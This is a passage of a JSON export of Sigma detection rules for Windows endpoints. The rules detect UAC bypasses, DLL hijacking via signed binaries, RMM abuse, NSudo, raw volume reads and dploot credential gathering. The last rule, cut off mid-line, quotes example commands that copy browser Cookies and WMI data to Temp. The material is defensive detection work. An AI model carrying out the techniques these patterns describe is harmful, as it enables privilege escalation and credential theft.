"rule_description": "Detects the execution of the devobj.dll UAC bypass, involving the hijacking of the DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer) or IFileOperation autoelevation.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5353f2e2-31d5-43e8-a979-c50711169465",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070834Z",
"creation_date": "2026-03-23T11:45:34.070836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070840Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_addinutil_suspicious_commandline.yml",
"content": "title: Suspicious AddInutil.exe Command-Line\nid: 5353f2e2-31d5-43e8-a979-c50711169465\ndescription: |\n Detects suspicious command-line arguments for the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code in an attempt to evade defenses.\n It is recommended to investigate the Addins.Store file contained in the folder specified by the AddInRoot or PipelineRoot argument.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Addinutil\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_addinutil:\n OriginalFileName: 'AddInUtil.exe'\n\n selection_absolute_flags:\n CommandLine|contains:\n - '-AddInRoot:'\n - '-PipelineRoot:'\n\n selection_absolute_paths:\n CommandLine|contains:\n - '\\AppData\\Local\\Temp\\'\n - '\\Desktop\\'\n - '\\Downloads\\'\n - '\\Users\\Public\\'\n - '\\Windows\\Temp\\'\n\n selection_relative:\n CommandLine|contains:\n - '-AddInRoot:.'\n - '-AddInRoot:\".\"'\n - '-PipelineRoot:.'\n - '-PipelineRoot:\".\"'\n CurrentDirectory|contains:\n - '\\AppData\\Local\\Temp\\'\n - '\\Desktop\\'\n - '\\Downloads\\'\n - '\\Users\\Public\\'\n - '\\Windows\\Temp\\'\n\n condition: selection_addinutil and (all of selection_absolute_* or selection_relative)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5353f2e2-31d5-43e8-a979-c50711169465",
"rule_name": "Suspicious AddInutil.exe Command-Line",
"rule_description": "Detects suspicious command-line arguments for the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code in an attempt to evade defenses.\nIt is recommended to investigate the Addins.Store file contained in the folder specified by the AddInRoot or PipelineRoot argument.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "535ea48e-2ee6-4997-83af-3260d094d0d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625990Z",
"creation_date": "2026-03-23T11:45:34.625992Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625996Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_simplehelp_process_execution.yml",
"content": "title: Process Executed via SimpleHelp RMM\nid: 535ea48e-2ee6-4997-83af-3260d094d0d1\ndescription: |\n Detects the execution of a process executed through SimpleHelp, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2025/06/20\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.SimpleHelp\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\Remote Access.exe'\n GrandparentImage|endswith: '\\session_win.exe'\n\n filter_legitimate:\n Image:\n - '?:\\Windows\\System32\\netsh.exe'\n - '?:\\Windows\\System32\\cacls.exe'\n - '*-complete\\winpty-agent64.exe'\n - '*-complete\\elev_win.exe'\n - '?:\\Windows\\System32\\icacls.exe'\n\n exclusion_legitimate_commandline:\n CommandLine:\n - 'cscript ?:\\Windows\\System32\\Printing_Admin_Scripts\\\\??-??\\prnmngr.vbs -d -p SimpleHelp Remote Printer'\n - 'cscript ?:\\Windows\\System32\\Printing_Admin_Scripts\\\\??-??\\prnport.vbs -d -r IP_127.0.0.1_9109'\n - 'cmd.exe /c driverquery'\n - 'cmd.exe /c schtasks'\n - 'cmd.exe /c sc query'\n - 'cmd.exe /c ipconfig /all'\n - 'cmd.exe /c systeminfo'\n - 'cmd.exe /c ver'\n - 'wmic partition get name,size,type'\n - 'wmic diskdrive get name,size,model'\n - 'wmic bios get name,serialnumber,version'\n - 'wmic csproduct get name,vendor,IdentifyingNumber'\n - 'wmic get bios serialnumber'\n - 'cmd.exe /c 
wmic printjob'\n - 'cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname'\n - 'cmd.exe /c net use'\n - 'cmd.exe /c net share'\n - 'netstat -a'\n - 'cmd.exe /c echo Computer: %COMPUTERNAME% & echo Username: %USERNAME% & echo Domain: %USERDOMAIN% & echo Logon Server: %LOGONSERVER% & echo DNS Domain: %USERDNSDOMAIN% & echo User Profile: %USERPROFILE% & echo System Root: %SYSTEMROOT%'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH AntiSpywareProduct get'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH AntiVirusProduct get'\n - 'wmic.exe /namespace:\\\\root\\SecurityCenter2 PATH FirewallProduct get'\n - 'cmd.exe /c netsh advfirewall show all State'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "535ea48e-2ee6-4997-83af-3260d094d0d1",
"rule_name": "Process Executed via SimpleHelp RMM",
"rule_description": "Detects the execution of a process executed through SimpleHelp, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "537c3c63-0a1d-4237-b175-bca6900b2cce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609317Z",
"creation_date": "2026-03-23T11:45:34.609321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609329Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://github.com/M2Team/NSudo",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_execution_of_nsudo.yml",
"content": "title: NSudo Execution\nid: 537c3c63-0a1d-4237-b175-bca6900b2cce\ndescription: |\n Detects the execution of NSudo.\n NSudo is an executable containing many system administration tools that allows launching programs with full privileges.\n NSudo can be used by attackers to perform various actions while evading defenses.\n It is recommended to determine whether the usage of NSudo is considered legitimate administrative behavior in this organization, in order to assess whether this action is legitimate.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://github.com/M2Team/NSudo\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NSudo\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName:\n - 'NSudoL.exe'\n - 'NSudo.exe'\n - Image|endswith:\n - '\\NSudoLG.exe'\n - '\\NSudoLC.exe'\n - '\\NSudoL.exe'\n - '\\NSudo.exe'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "537c3c63-0a1d-4237-b175-bca6900b2cce",
"rule_name": "NSudo Execution",
"rule_description": "Detects the execution of NSudo.\nNSudo is an executable containing many system administration tools that allows launching programs with full privileges.\nNSudo can be used by attackers to perform various actions while evading defenses.\nIt is recommended to determine whether the usage of NSudo is considered legitimate administrative behavior in this organization, in order to assess whether this action is legitimate.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5380e454-9b74-48ec-8cb3-438df8ed7659",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083177Z",
"creation_date": "2026-03-23T11:45:34.083179Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083183Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_powershell_direct_drive_access.yml",
"content": "title: Direct Volume Access from DOS Path via PowerShell\nid: 5380e454-9b74-48ec-8cb3-438df8ed7659\ndescription: |\n Detects a direct volume access from a DOS path in a PowerShell script.\n Attackers may directly access a volume to bypass file access controls and file system monitoring.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1006/\ndate: 2021/12/13\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'New-Object IO.FileStream'\n - '\"\\\\.\\?:\"'\n - '.Read('\n - '.Close()'\n - \"'Open', 'Read', 'ReadWrite'\"\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5380e454-9b74-48ec-8cb3-438df8ed7659",
"rule_name": "Direct Volume Access from DOS Path via PowerShell",
"rule_description": "Detects a direct volume access from a DOS path in a PowerShell script.\nAttackers may directly access a volume to bypass file access controls and file system monitoring.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53817af8-8645-4335-b392-2d0268564b09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599255Z",
"creation_date": "2026-03-23T11:45:34.599259Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599266Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_programdata_environment_variable_modification.yml",
"content": "title: ProgramData User Environment Variable Modified\nid: 53817af8-8645-4335-b392-2d0268564b09\ndescription: |\n Detects when the ProgramData user environment variable is being modified.\n Attackers can change this environment variable to redirect the execution of vulnerable applications or to prepare the CompMgmtLauncher.exe UAC bypass.\n This variable should normally not be defined in the user environment variables.\n It is recommended to analyze the process responsible for this registry modification, as well as to look for other malicious behavior or UAC bypasses following this alert.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/10/16\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Environment\\programdata'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType: 'RenameValue'\n NewName: 'HKU\\\\*\\Environment\\programdata'\n\n condition: (selection_set_value and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53817af8-8645-4335-b392-2d0268564b09",
"rule_name": "ProgramData User Environment Variable Modified",
"rule_description": "Detects when the ProgramData user environment variable is being modified.\nAttackers can change this environment variable to redirect the execution of vulnerable applications or to prepare the CompMgmtLauncher.exe UAC bypass.\nThis variable should normally not be defined in the user environment variables.\nIt is recommended to analyze the process responsible for this registry modification, as well as to look for other malicious behavior or UAC bypasses following this alert.\n",
"rule_creation_date": "2020-10-16",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53a9e918-581b-438c-846f-3eb2cbe098a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600192Z",
"creation_date": "2026-03-23T11:45:34.600195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdmappinstaller.yml",
"content": "title: DLL Hijacking via mdmappinstaller.exe\nid: 53a9e918-581b-438c-846f-3eb2cbe098a2\ndescription: |\n Detects potential Windows DLL Hijacking via mdmappinstaller.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdmappinstaller.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\iri.dll'\n - '\\msi.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53a9e918-581b-438c-846f-3eb2cbe098a2",
"rule_name": "DLL Hijacking via mdmappinstaller.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdmappinstaller.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53f19997-8649-4b9f-8d36-bf6148563d24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088506Z",
"creation_date": "2026-03-23T11:45:34.088508Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088512Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chkdsk.yml",
"content": "title: DLL Hijacking via chkdsk.exe\nid: 53f19997-8649-4b9f-8d36-bf6148563d24\ndescription: |\n Detects potential Windows DLL Hijacking via chkdsk.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chkdsk.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53f19997-8649-4b9f-8d36-bf6148563d24",
"rule_name": "DLL Hijacking via chkdsk.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chkdsk.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5404c14d-2047-4c33-ac6d-2f18e200d173",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093722Z",
"creation_date": "2026-03-23T11:45:34.093724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093736Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/zblurx/dploot",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1555/003/",
"https://attack.mitre.org/techniques/T1003/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1555_003_dploot_commandline.yml",
"content": "title: DPAPI Sensitive Files Gathered via NetExec/DonPAPI\nid: 5404c14d-2047-4c33-ac6d-2f18e200d173\ndescription: |\n Detects sensitive file gathering via dploot.\n dploot is a Python module specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials; it is used in tools such as DonPAPI and NetExec.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions, used in particular by browsers.\n It is recommended to investigate the actions made by the child process and to identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/zblurx/dploot\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\n - https://attack.mitre.org/techniques/T1003/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/10/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - attack.t1003\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Dploot\n - classification.Windows.HackTool.NetExec\n - classification.Windows.HackTool.DonPAPI\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # mmcexec\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # cmd.exe /Q /c copy C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA C:\\Windows\\Temp\\1728914362.695766\n # cmd.exe /Q /c copy C:\\Users\\Administrateur\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies C:\\Windows\\Temp\\1728908483.534047\n - 'cmd.exe /Q /c copy *\\\\* 